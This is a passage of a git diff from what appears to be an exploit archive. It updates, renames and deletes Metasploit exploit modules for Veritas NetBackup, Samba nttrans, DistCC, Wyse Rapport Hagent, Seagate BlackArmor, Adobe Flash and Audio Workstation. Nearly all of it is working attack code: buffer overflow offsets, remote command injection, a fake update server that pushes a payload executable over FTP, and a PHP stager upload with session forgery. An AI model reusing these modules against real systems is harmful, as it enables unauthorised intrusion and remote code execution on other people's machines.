'Description' => %q{ - This module allows arbitrary command execution on an - ephemeral port opened by Veritas NetBackup, whilst an - administrator is authenticated. The port is opened and - allows direct console access as root or SYSTEM from - any source address. - }, - 'Author' => [ 'patrick' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 10617 $', - 'References' => - [ - [ 'CVE', '2004-1389' ], - [ 'OSVDB', '11026' ], - [ 'BID', '11494' ], - [ 'URL', 'http://seer.support.veritas.com/docs/271727.htm' ], - - ], - 'Privileged' => true, - 'Platform' => ['unix', 'win', 'linux'], - 'Arch' => ARCH_CMD, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => '', - 'DisableNops' => true, - 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic perl telnet', - } - }, - 'Targets' => - [ - ['Automatic', { }], - ], - 'DisclosureDate' => 'Oct 21 2004', - 'DefaultTarget' => 0)) - end - - def check - connect - - sploit = rand_text_alphanumeric(10) - buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n" - - sock.put(buf) - banner = sock.get(3,3) - - disconnect - - if (banner and banner =~ /#{sploit}/) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe - end - - def exploit - connect - - sploit = payload.encoded.split(" ") - - buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n" - buf << payload.encoded - buf << "\n" - - sock.put(buf) - res = sock.get(-1,3) - - print_status("#{res}") - - handler - disconnect - end - -end diff --git a/platforms/multiple/remote/37536.rb b/platforms/multiple/remote/37536.rb index 37ac7f36f..169e8db11 100755 --- a/platforms/multiple/remote/37536.rb +++ b/platforms/multiple/remote/37536.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer @@ -17,13 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: - Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. - Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043. diff --git a/platforms/multiple/remote/41693.rb b/platforms/multiple/remote/41693.rb deleted file mode 100755 index cf4f7169f..000000000 --- a/platforms/multiple/remote/41693.rb +++ /dev/null @@ -1,153 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class MetasploitModule < Msf::Exploit::Remote - Rank = AverageRanking - - include Msf::Exploit::Remote::SMB::Client - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow', - 'Description' => %q{ - This module attempts to exploit a buffer overflow vulnerability present in - versions 2.2.2 through 2.2.6 of Samba. - The Samba developers report this as: - "Bug in the length checking for encrypted password change requests from clients." - The bug was discovered and reported by the Debian Samba Maintainers. - }, - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2002-1318' ], - [ 'OSVDB', '14525' ], - [ 'BID', '6210' ], - [ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ] - ], - 'Privileged' => true, - 'Platform' => 'linux', - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - 'MinNops' => 512, - }, - 'Targets' => - [ - [ "Samba 2.2.x Linux x86", - { - 'Arch' => ARCH_X86, - 'Platform' => 'linux', - 'Rets' => [0x01020304, 0x41424344], - }, - ], - ], - 'DisclosureDate' => 'Apr 7 2003' - )) - - register_options( - [ - Opt::RPORT(139) - ], self.class) - end - - def exploit - - # 0x081fc968 - - pattern = Rex::Text.pattern_create(12000) - - pattern[532, 4] = [0x81b847c].pack('V') - pattern[836, payload.encoded.length] = payload.encoded - - # 0x081b8138 - - connect - smb_login - - targ_address = 0xfffbb7d0 - - # - # Send a NTTrans request with ParameterCountTotal set to the buffer length - # - - subcommand = 1 - param = '' - body = '' - setup_count = 0 - setup_data = '' - data = param + body - - pkt = CONST::SMB_NTTRANS_PKT.make_struct - self.simple.client.smb_defaults(pkt['Payload']['SMB']) - - base_offset = pkt.to_s.length + (setup_count * 2) - 4 - param_offset = base_offset - data_offset = param_offset + param.length - - pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT - pkt['Payload']['SMB'].v['Flags1'] = 0x18 - pkt['Payload']['SMB'].v['Flags2'] = 0x2001 - pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count - - pkt['Payload'].v['ParamCountTotal'] =12000 - pkt['Payload'].v['DataCountTotal'] = body.length - pkt['Payload'].v['ParamCountMax'] = 1024 - pkt['Payload'].v['DataCountMax'] = 65504 - pkt['Payload'].v['ParamCount'] = param.length - pkt['Payload'].v['ParamOffset'] = param_offset - pkt['Payload'].v['DataCount'] = body.length - pkt['Payload'].v['DataOffset'] = data_offset - pkt['Payload'].v['SetupCount'] = setup_count - pkt['Payload'].v['SetupData'] = setup_data - pkt['Payload'].v['Subcommand'] = subcommand - - pkt['Payload'].v['Payload'] = data - - self.simple.client.smb_send(pkt.to_s) - ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT) - - # - # Send a NTTrans secondary request with the magic displacement - # - - param = pattern - body = '' - data = param + body - - pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct - self.simple.client.smb_defaults(pkt['Payload']['SMB']) - - base_offset = pkt.to_s.length - 4 - param_offset = base_offset - data_offset = param_offset + param.length - - pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY - pkt['Payload']['SMB'].v['Flags1'] = 0x18 - pkt['Payload']['SMB'].v['Flags2'] = 0x2001 - pkt['Payload']['SMB'].v['WordCount'] = 18 - - pkt['Payload'].v['ParamCountTotal'] = param.length - pkt['Payload'].v['DataCountTotal'] = body.length - pkt['Payload'].v['ParamCount'] = param.length - pkt['Payload'].v['ParamOffset'] = param_offset - pkt['Payload'].v['ParamDisplace'] = targ_address - pkt['Payload'].v['DataCount'] = body.length - pkt['Payload'].v['DataOffset'] = data_offset - - pkt['Payload'].v['Payload'] = data - - self.simple.client.smb_send(pkt.to_s) - ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY) - - - handler - - end - -end \ No newline at end of file diff --git a/platforms/multiple/remote/9915.rb b/platforms/multiple/remote/9915.rb index f2415f015..6327cbcee 100755 --- a/platforms/multiple/remote/9915.rb +++ b/platforms/multiple/remote/9915.rb @@ -1,9 +1,9 @@ ## -# $Id$ +# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,20 +14,21 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'DistCC Daemon Command Execution', 'Description' => %q{ This module uses a documented security weakness to execute arbitrary commands on any system running distccd. - + }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', + 'Version' => '$Revision: 9669 $', 'References' => [ [ 'CVE', '2004-2687'], @@ -36,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Platform' => ['unix'], - 'Arch' => ARCH_CMD, + 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { @@ -48,16 +49,18 @@ class Metasploit3 < Msf::Exploit::Remote 'RequiredCmd' => 'generic perl ruby bash telnet', } }, - 'Targets' => + 'Targets' => [ [ 'Automatic Target', { }] ], - 'DefaultTarget' => 0)) - + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 01 2002' + )) + register_options( [ Opt::RPORT(3632) - ], self.class) + ], self.class) end def exploit @@ -65,23 +68,24 @@ class Metasploit3 < Msf::Exploit::Remote distcmd = dist_cmd("sh", "-c", payload.encoded); sock.put(distcmd) - + dtag = rand_text_alphanumeric(10) sock.put("DOTI0000000A#{dtag}\n") - + res = sock.get_once(24, 5) - + if !(res and res.length == 24) print_status("The remote distccd did not reply to our request") disconnect return end - + # Check STDERR res = sock.get_once(4, 5) res = sock.get_once(8, 5) len = [res].pack("H*").unpack("N")[0] - + + return if not len if (len > 0) res = sock.get_once(len, 5) res.split("\n").each do |line| @@ -93,34 +97,35 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get_once(4, 5) res = sock.get_once(8, 5) len = [res].pack("H*").unpack("N")[0] - + + return if not len if (len > 0) res = sock.get_once(len, 5) res.split("\n").each do |line| print_status("stdout: #{line}") end end - + handler disconnect end - - + + # Generate a distccd command def dist_cmd(*args) - + # Convince distccd that this is a compile args.concat(%w{# -c main.c -o main.o}) - + # Set distcc 'magic fairy dust' and argument count res = "DIST00000001" + sprintf("ARGC%.8x", args.length) - + # Set the command arguments args.each do |arg| res << sprintf("ARGV%.8x%s", arg.length, arg) end - + return res end -end +end \ No newline at end of file diff --git a/platforms/multiple/remote/9934.rb b/platforms/multiple/remote/9934.rb index 6d69a4650..e3ba4258c 100755 --- a/platforms/multiple/remote/9934.rb +++ b/platforms/multiple/remote/9934.rb @@ -1,35 +1,38 @@ ## -# $Id: hagent_untrusted_hsdata.rb +# $Id: hagent_untrusted_hsdata.rb 10998 2010-11-11 22:43:22Z jduck $ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/projects/Framework/ +# http://metasploit.com/framework/ ## require 'timeout' require 'msf/core' class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::FtpServer + include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution', 'Description' => %q{ - This module exploits the Wyse Rapport Hagent service by pretending to - be a legitimate server. This process involves starting both HTTP and - FTP services on the attacker side, then contacting the Hagent service of - the target and indicating that an update is available. The target will - then download the payload wrapped in an executable from the FTP service. + This module exploits the Wyse Rapport Hagent service by pretending to + be a legitimate server. This process involves starting both HTTP and + FTP services on the attacker side, then contacting the Hagent service of + the target and indicating that an update is available. The target will + then download the payload wrapped in an executable from the FTP service. }, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Author' => 'kf', - 'Version' => '$Revision$', - 'References' => + 'Version' => '$Revision: 10998 $', + 'References' => [ ['CVE', '2009-0695'], ['OSVDB', '55839'], @@ -39,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'], ['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'], ], + 'Privileged' => true, 'Payload' => { 'Space' => 2048, @@ -48,46 +52,46 @@ class Metasploit3 < Msf::Exploit::Remote { 'EXITFUNC' => 'process', }, - 'Targets' => - [ - [ 'Windows XPe x86',{'Platform' => 'win',}], - [ 'Wyse Linux x86', {'Platform' => 'linux',}], - ], + 'Targets' => + [ + [ 'Windows XPe x86',{'Platform' => 'win',}], + [ 'Wyse Linux x86', {'Platform' => 'linux',}], + ], 'DefaultTarget' => 0, - 'Privileged' => true + 'DisclosureDate' => 'Jul 10 2009' )) - register_options([ - OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]), - Opt::RPORT(80), - ], self.class) + register_options( + [ + OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]), + Opt::RPORT(80), + ], self.class) end def exploit - + if(datastore['SRVPORT'].to_i != 21) print_error("This exploit requires the FTP service to run on port 21") return end - + # Connect to the target service print_status("Connecting to the target") connect() - + # Start the FTP service print_status("Starting the FTP server") start_service() - + # Create the executable with our payload print_status("Generating the EXE") + @exe_file = generate_payload_exe if target['Platform'] == 'win' - @exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded) maldir = "C:\\" # Windows malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe" co = "XP" elsif target['Platform'] == 'linux' - @exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded) maldir = "//tmp//" # Linux malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin" co = "LXS" @@ -102,113 +106,122 @@ class Metasploit3 < Msf::Exploit::Remote 'MsfExploit' => self } }) - + + # Let this close automatically + add_socket(wdmserver) + wdmserver_port = wdmserver.getsockname[2] print_status("Starting the HTTP service on port #{wdmserver_port}") - - + + fakerapport = Rex::Socket.source_address(rhost) fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0] mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|" - # FTP Credentials + # FTP Credentials ftpserver = Rex::Socket.source_address(rhost) ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1) ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1) ftpport = 21 ftpsecure = '0' - incr = 10 - pwn1 = - "&UP0|&SI=1|UR=9" + - "|CO \x0f#{co}\x0f|#{incr}" + - # "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" + - "|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + incr = 10 + pwn1 = + "&UP0|&SI=1|UR=9" + + "|CO \x0f#{co}\x0f|#{incr}" + + # "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" + + "|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}" - pwn2 = - "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}" + pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}" - pwn3 = - "|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + - # "|RB|#{incr+1}" + - # "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" + - #"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + - # FTP Paramaters - "|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" + - "|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" + - # No clue - "|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|" + pwn3 = + "|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + + # "|RB|#{incr+1}" + + # "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" + + #"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + + # FTP Paramaters + "|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" + + "|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" + + # No clue + "|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|" if target['Platform'] == 'win' - pwn = pwn1 + pwn3 + pwn = pwn1 + pwn3 elsif target['Platform'] == 'linux' - pwn = pwn1 + pwn2 + pwn3 + pwn = pwn1 + pwn2 + pwn3 end # Send the malicious request sock.put(mal) - + # Download some response data - resp = sock.get_once(-1, 10) - print_status("Received: " + resp) - + resp = sock.get_once(-1, 10) + print_status("Received: #{resp}") + + if not resp + print_error("No reply from the target, this may not be a vulnerable system") + return + end + print_status("Waiting on a connection to the HTTP service") begin Timeout.timeout(190) do - done = false - while (not done and session = wdmserver.accept) - req = session.recvfrom(2000)[0] - next if not req - next if req.empty? - print_status("HTTP Request: #{req.split("\n")[0].strip}") - - case req - when /V01/ - print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)") - res = pwn - when /V02/ - print_status("++ device sending V02 query...") - res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|" - done = true - - when /V55/ - print_status("++ device sending V55 query...") - res = pwn - when /POST/ # PUT is used for non encrypted requests. - print_status("++ device sending V55 query...") - res = pwn - done = true - else - print_status("+++ sending generic response...") - res = pwn + done = false + while (not done and session = wdmserver.accept) + req = session.recvfrom(2000)[0] + next if not req + next if req.empty? + print_status("HTTP Request: #{req.split("\n")[0].strip}") + + case req + when /V01/ + print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)") + res = pwn + when /V02/ + print_status("++ device sending V02 query...") + res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|" + done = true + + when /V55/ + print_status("++ device sending V55 query...") + res = pwn + when /POST/ # PUT is used for non encrypted requests. + print_status("++ device sending V55 query...") + res = pwn + done = true + else + print_status("+++ sending generic response...") + res = pwn + end + + print_status("Sending reply: #{res}") + session.put(res) + session.close end - - print_status("Sending reply: #{res}") - session.put(res) - session.close end - end - rescue ::TimeoutError + rescue ::Timeout::Error print_status("Timed out waiting on the HTTP request") wdmserver.close disconnect() stop_service() return end - + print_status("Waiting on the FTP request...") stime = Time.now.to_f while(not @exe_sent) break if (stime + 90 < Time.now.to_f) - select(nil, nil, nil, 0.25) + select(nil, nil, nil, 0.25) end - + if(not @exe_sent) print_status("No executable sent :(") end - + stop_service() wdmserver.close() - + handler disconnect end @@ -220,14 +233,14 @@ class Metasploit3 < Msf::Exploit::Remote c.put("425 Can't build data connection\r\n") return end - + c.put("150 Opening BINARY mode data connection for #{arg}\r\n") conn.put(@exe_file) c.put("226 Transfer complete.\r\n") conn.close @exe_sent = true end - + def on_client_command_size(c,arg) print_status("#{@state[c][:name]} FTP size request for #{arg}") c.put("213 #{@exe_file.length}\r\n") diff --git a/platforms/multiple/remote/9941.rb b/platforms/multiple/remote/9941.rb index c20f2ad4d..820f93a2a 100755 --- a/platforms/multiple/remote/9941.rb +++ b/platforms/multiple/remote/9941.rb @@ -1,9 +1,9 @@ ## -# $Id$ +# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -12,14 +12,15 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking - include Exploit::Remote::Tcp + include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'VERITAS NetBackup Remote Command Execution', 'Description' => %q{ - This module allows arbitrary command execution on an + This module allows arbitrary command execution on an ephemeral port opened by Veritas NetBackup, whilst an administrator is authenticated. The port is opened and allows direct console access as root or SYSTEM from @@ -27,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', + 'Version' => '$Revision: 10617 $', 'References' => [ [ 'CVE', '2004-1389' ], @@ -50,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote 'RequiredCmd' => 'generic perl telnet', } }, - 'Targets' => + 'Targets' => [ ['Automatic', { }], ], @@ -86,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(buf) res = sock.get(-1,3) - + print_status("#{res}") handler diff --git a/platforms/php/remote/36264.rb b/platforms/php/remote/36264.rb index 7eb4bedf3..3ee4f5532 100755 --- a/platforms/php/remote/36264.rb +++ b/platforms/php/remote/36264.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -22,7 +22,6 @@ class Metasploit4 < Msf::Exploit::Remote without the need for authentication. The cookie can be easily decrypted using a known static encryption key and re-encrypted once the PHP object string has been modified. - This module has been tested on the STBN300 device. }, 'Author' => [ @@ -87,7 +86,7 @@ class Metasploit4 < Msf::Exploit::Remote headers = res.to_s # validate headers - if headers.incude?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28') + if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28') # and make sure that the body contains the title we'd expect if res.body.include?('Login to BlackArmor') return Exploit::CheckCode::Appears @@ -109,7 +108,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 1 - Establish a session with the target which will give us a PHP object we can # work with. begin - print_status("#{peer} - Establishing session with target ...") + print_status("Establishing session with target ...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri), 'method' => 'GET', @@ -121,21 +120,21 @@ class Metasploit4 < Msf::Exploit::Remote if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/ cookie_value = $1.strip else - fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.") + fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.") + fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") end # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly # then update it so that it's an admin session before re-encrypting - print_status("#{peer} - Upgrading session to administrator ...") + print_status("Upgrading session to administrator ...") php_object = decode_cookie(cookie_value) - vprint_status("#{peer} - PHP Object: #{php_object}") + vprint_status("PHP Object: #{php_object}") admin_php_object = set_string(php_object, 'is_admin', 'yes') admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) - vprint_status("#{peer} - Admin PHP object: #{admin_php_object}") + vprint_status("Admin PHP object: #{admin_php_object}") admin_cookie_value = encode_cookie(admin_php_object) @@ -146,7 +145,7 @@ class Metasploit4 < Msf::Exploit::Remote config_time = ::Time.now.to_i begin - print_status("#{peer} - Extracting existing host configuration ...") + print_status("Extracting existing host configuration ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), 'method' => 'GET', @@ -167,14 +166,14 @@ class Metasploit4 < Msf::Exploit::Remote end end else - fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.") + fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.") + fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") end - print_good("#{peer} - Host configuration extracted.") - vprint_status("#{peer} - Host configuration: #{host_config}") + print_good("Host configuration extracted.") + vprint_status("Host configuration: #{host_config}") # Step 4 - replace the host device description with a custom payload that can # be used for LFI. We have to keep the payload small because of size limitations @@ -191,7 +190,7 @@ class Metasploit4 < Msf::Exploit::Remote installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" stager = Rex::Text.encode_base64(installer) stager = xml_encode("") - vprint_status("#{peer} - Stager: #{stager}") + vprint_status("Stager: #{stager}") # Butcher the XML directly rather than attempting to use REXML. The target XML # parser is way to simple/flaky to deal with the proper stuff that REXML @@ -203,7 +202,7 @@ class Metasploit4 < Msf::Exploit::Remote vprint_status(xml_payload) # Step 5 - set the host description to the stager so that it is written to disk - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") begin res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), @@ -221,16 +220,16 @@ class Metasploit4 < Msf::Exploit::Remote ) unless res && res.code == 200 - fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).") + fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).") end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") + fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") end - print_good("#{peer} - Stager uploaded.") + print_good("Stager uploaded.") # Step 6 - Invoke the stage, passing in a self-deleting php script body. - print_status("#{peer} - Executing stager ...") + print_status("Executing stager ...") payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") payload_cookie_value = encode_cookie(payload_php_object) self_deleting_payload = "" @@ -250,20 +249,20 @@ class Metasploit4 < Msf::Exploit::Remote ) if res && res.code == 200 - print_good("#{peer} - Stager execution succeeded, payload ready for execution.") + print_good("Stager execution succeeded, payload ready for execution.") else - print_error("#{peer} - Stager execution failed (invalid result).") + print_error("Stager execution failed (invalid result).") errored = true end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - print_error("#{peer} - Stager execution failed (unable to establish connection).") + print_error("Stager execution failed (unable to establish connection).") errored = true end # Step 7 - try to restore the previous configuration, allowing exceptions # to bubble up given that we're at the end. This step is important because # we don't want to leave a trail of junk on disk at the end. - print_status("#{peer} - Restoring host config ...") + print_status("Restoring host config ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', @@ -281,7 +280,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 8 - invoke the installed payload, but only if all went to plan. unless errored - print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...") + print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, payload_file), 'method' => 'GET', @@ -325,7 +324,7 @@ class Metasploit4 < Msf::Exploit::Remote cookie_value = xor(block, datastore['XORKEY']) cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) - vprint_status("#{peer} - Cookie value: #{cookie_value}") + vprint_status("Cookie value: #{cookie_value}") cookie_value end diff --git a/platforms/windows/local/35935.py b/platforms/windows/dos/35935.py similarity index 100% rename from platforms/windows/local/35935.py rename to platforms/windows/dos/35935.py diff --git a/platforms/windows/local/36841.py b/platforms/windows/dos/36841.py similarity index 100% rename from platforms/windows/local/36841.py rename to platforms/windows/dos/36841.py diff --git a/platforms/windows/remote/9139.pl b/platforms/windows/dos/9139.pl similarity index 100% rename from platforms/windows/remote/9139.pl rename to platforms/windows/dos/9139.pl diff --git a/platforms/windows/local/9364.py b/platforms/windows/dos/9364.py similarity index 100% rename from platforms/windows/local/9364.py rename to platforms/windows/dos/9364.py diff --git a/platforms/windows/local/10363.rb b/platforms/windows/local/10363.rb index 7fed5b42e..08a7af28e 100755 --- a/platforms/windows/local/10363.rb +++ b/platforms/windows/local/10363.rb @@ -1,3 +1,14 @@ +## +# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Exploit::Remote @@ -5,27 +16,30 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh - + def initialize(info = {}) super(update_info(info, 'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. - When opening a malicious pls file with the Audio Workstation, - a remote attacker could overflow a buffer and execute - arbitrary code. + When opening a malicious pls file with the Audio Workstation, + a remote attacker could overflow a buffer and execute + arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'germaya_x', 'dookie', ], - 'Version' => '$Revision: 7724 $', + 'Version' => '$Revision: 10477 $', 'References' => [ + [ 'CVE', '2009-0476' ], + [ 'OSVDB', '55424' ], [ 'URL', 'http://www.exploit-db.com/exploits/10353' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', - }, + 'DisablePayloadHandler' => 'true', + }, 'Payload' => { 'Space' => 4100, @@ -35,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll ], @@ -43,10 +57,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 08 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 